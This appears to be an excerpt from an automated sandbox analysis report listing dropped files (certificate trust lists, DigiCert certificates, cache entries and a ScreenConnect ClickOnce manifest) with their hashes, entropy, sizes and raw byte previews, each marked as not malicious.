                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):13340
                                                                                                                                                                                                                                                                  Entropy (8bit):2.6853539028095166
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:TiZYWCEdgxCYrYzWNHIUYEZA0tKiwVnw42wzLHpaSt7dMtbckWIiH3:2ZDCysq00daG7dMZckRiH3
                                                                                                                                                                                                                                                                  MD5:38764F6947A45C5E57E096F835613E02
                                                                                                                                                                                                                                                                  SHA1:7CE38BCB794970EA9BB62A3166462072BAB53A6E
                                                                                                                                                                                                                                                                  SHA-256:8E2EA72E26A04066EFC4175A212886B12770C0C1D9E213D0D18A4046A076E95C
                                                                                                                                                                                                                                                                  SHA-512:F0B1440569D5915A84533F1CA35AF02B56C89C85CFBA2E378915013B7C71A06616C4BA23733060FDB9F6F9C8513D0F172D2278DA6BB563925269DB1F21566525
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4770
                                                                                                                                                                                                                                                                  Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                                                                  MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                                                                  SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                                                                  SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                                                                  SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.).*.....Y@...(..).R."E..D^6........u....|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O.*..R....*......D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;|.*h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.*z..2.Py...A..s...z..@...4..........4.....*Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):71954
                                                                                                                                                                                                                                                                  Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1716
                                                                                                                                                                                                                                                                  Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                                  MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                                  SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                                  SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                                  SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):727
                                                                                                                                                                                                                                                                  Entropy (8bit):7.562070540258883
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:5onfZSc5RlRtBfQwRhs5vCZgPVrVJEYbw7OIiVFQlb8PjcNCUAnqr/E:5i8cdZTRhG+gPZPfIgMb8PjcNCa/E
                                                                                                                                                                                                                                                                  MD5:EB9A1D98CC4B6AC3D674A6621DF5A758
                                                                                                                                                                                                                                                                  SHA1:5E9BC182D48B8E86A61D8A3F4B5ADD9C88DA6800
                                                                                                                                                                                                                                                                  SHA-256:20D856D68DBA3E2246EBB62A5EAEDCEFDA221ACCFA1B9362B33AFAD33B6E48C7
                                                                                                                                                                                                                                                                  SHA-512:1054D82E5E1B2F2C1416D31F01FF2C172ACA8DCC31A622CDD959F918B78A474BD9B40A9B7316122A8262FAC24D6236860E2EADD665030A61D56C5C0A153F81C7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241107184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241107184215Z....20241114184215Z0...*.H.............t.yl..<Y.&4S...*..).G...s.X.S.x....)l.ng.Jpe....-...}@....|.....J.\#(....]..}.......k/.a..v.I.w...6.W.`{.D..z.%.c.T".p....\....CX..L...u.n...6t.6..1W....f....m6.W....?..N...d.Q..1...H+..k..A.X..../&a.I....#..)..h.*.'..@...'s.~.i.X"...w.B...P\.K..3..V.5...A.-l..#.V...i...\.)=..G.ob....o............eTi.1...)k..+.e.?. :.X.0^.k.4.;.....S8....\.K.w#q..._m.F....(^.......}.\.}?...W....T.......)..#..{6QC...'....=....f.....>........{}.k..\...*.i.....e..F..1&.%.U.aAO....k....<....p?S.
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1428
                                                                                                                                                                                                                                                                  Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                                  MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                                  SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                                  SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                                  SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                                                  Entropy (8bit):3.2463313982716158
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:kKTncsN+SkQlPlEGYRMY9z+s3Ql2DUevat:bcTkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                                  MD5:FB4D9413322593FF7DC7B16D98B7CFF4
                                                                                                                                                                                                                                                                  SHA1:A136E30833FFBECF1BE7564B42B40A0945599519
                                                                                                                                                                                                                                                                  SHA-256:3D14AA4D6B034108D10E8E7D91877432851C11E6D539A0649CB0DD51922C62D9
                                                                                                                                                                                                                                                                  SHA-512:11AD5BA2E9491F433B8F6BC66EAFA98E6E0C4CC9CA679E294D5F22CAF01DCECA00D16554F86BE76C1FE14249FE9A0546661C734788A1E34F44CA010354881F9C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:p...... ........ceCH.1..(....................................................... .........p.........$.....(=........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                  Entropy (8bit):3.2371973337041244
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:kKTpF9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:bpsDImsLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                                  MD5:BE5429D9FBCE03379498A0A3B458F21C
                                                                                                                                                                                                                                                                  SHA1:14A7DF9EF7B8D2A5EE5915CC6B78DFBAAFB186E3
                                                                                                                                                                                                                                                                  SHA-256:3EC75732DFC218592FF9A8C4095465841037715DC4227B7F154376B1AB968B06
                                                                                                                                                                                                                                                                  SHA-512:3A0C4CF3D53804C259E3E3E3F7A83B5CC19FBD8F66E2AF9982684C44EA3AB38AC3A4E74F73FE369497C40498FCC5639FC19803D3F9D43C43AE2D23804595371E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:p...... ...........I.1..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):308
                                                                                                                                                                                                                                                                  Entropy (8bit):3.196114854714615
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:kKfZdzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:3utWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                                  MD5:8D7F7CB9E7EDB3BE2A41321E2EE485F7
                                                                                                                                                                                                                                                                  SHA1:D6DA99DB871F4D19442A4875C82F06E9BE426043
                                                                                                                                                                                                                                                                  SHA-256:245FFDE4C819D673D73E0B79AE08A09A520ADF6E4746A0DA724A5086BF808B20
                                                                                                                                                                                                                                                                  SHA-512:6500549BF3A1FBB73D9F5FA1B8BDF92D3BBE6437153AE230715947D00013072723A0F960D5ABF50751D178E387C4A3319711350940F5E0531F3476BE681A6894
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:p...... .........S.I.1..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):412
                                                                                                                                                                                                                                                                  Entropy (8bit):3.9777437902841712
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:kKEcEPlph1tsMyfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:ihvymxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                                  MD5:1A4845B4C056E7CD9E4B1ECBF0D20FD6
                                                                                                                                                                                                                                                                  SHA1:5F8EAB81297E1C521124778DF00D0B7C88F4FA87
                                                                                                                                                                                                                                                                  SHA-256:0C7184EAD269613738A0E35BD33393CE83E2B21DFC90A642A3715A7F25929A95
                                                                                                                                                                                                                                                                  SHA-512:CC1C945541B3FB580F5722206AF87CF83DB9DB52CA42F0EE3701025B504FADB16C8E88ACDBEE4B461DC3C79556D53670AC57DF68DB43D044055A489359B4BC9A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:p...... ....(...bk.I.1..(...................D1......6......................6.. ..........<.1.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):254
                                                                                                                                                                                                                                                                  Entropy (8bit):3.052898866971229
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:kKSLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:aLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                                  MD5:F219690347CE07629A39F000F541E8A3
                                                                                                                                                                                                                                                                  SHA1:358F6081EA086DA872E1FFA6D83C93E8BF834CC4
                                                                                                                                                                                                                                                                  SHA-256:4CAD46EF05393BFFAC2472418791EB62AC8FC6D8CA7E7BC7E721C21B3D680B9F
                                                                                                                                                                                                                                                                  SHA-512:6DD5F56A709EE1379542566D888B7EA47CA6F66D4BF430E76321DD6ED5BB4F2E733DE74ACFA85C379093C8B65D279577902C16031F070F7FC07C707E2B570632
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:p...... ....l....K.H.1..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):25496
                                                                                                                                                                                                                                                                  Entropy (8bit):5.618626919409485
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:GlqSaSVGo26tX9DkX9R/QPIBM7YguPkuaCH7kLgOv0Tcu/:GshC26tX9DkX9R/QPI+0gu8uxHOgOvIn
                                                                                                                                                                                                                                                                  MD5:9BE0037102B52A0D8CB9FBA4FEDDE2E7
                                                                                                                                                                                                                                                                  SHA1:558C6516B10F1AD050D6517B814E920D80F725BA
                                                                                                                                                                                                                                                                  SHA-256:771EFA1AD593419E534C9E197CA46C11170CE9EBA7C503CBEFF3E6788CEB99C6
                                                                                                                                                                                                                                                                  SHA-512:8B8C9749A3E43D6EF124ADDAB5AAD525795CCDACE1EC40E4B1031930918C9E6A02517EF09567B22B60E625ED3CD38CEBE9C279520C84760ED864DA86F9817EE0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:PcmH........_V.SV...f.......!...T...........................e...?....<.g..J.|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R...O.&r..VzU......3LD.SY...[s.T..<\...........`.......=...P...S...V...Z...].......,.......L.......T.......\.......`.......|...........................................@.......0...........<.......T.......h.......|...0.......................................0...........<.......T.......h.......|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):17866
                                                                                                                                                                                                                                                                  Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                                                                  MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                                                                  SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                                                                  SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                                                                  SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3452
                                                                                                                                                                                                                                                                  Entropy (8bit):4.343561064744891
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:XIEfBeF7lWuWWuLg0e6S+9owQX7g27mL438ciUcVM8Aw+9t6hIYX:XJ3uWWmeV+WwQXlmL4MckVM8Aw+OhIYX
                                                                                                                                                                                                                                                                  MD5:06B4EDDC7E4423E0A311EAF7798E8C18
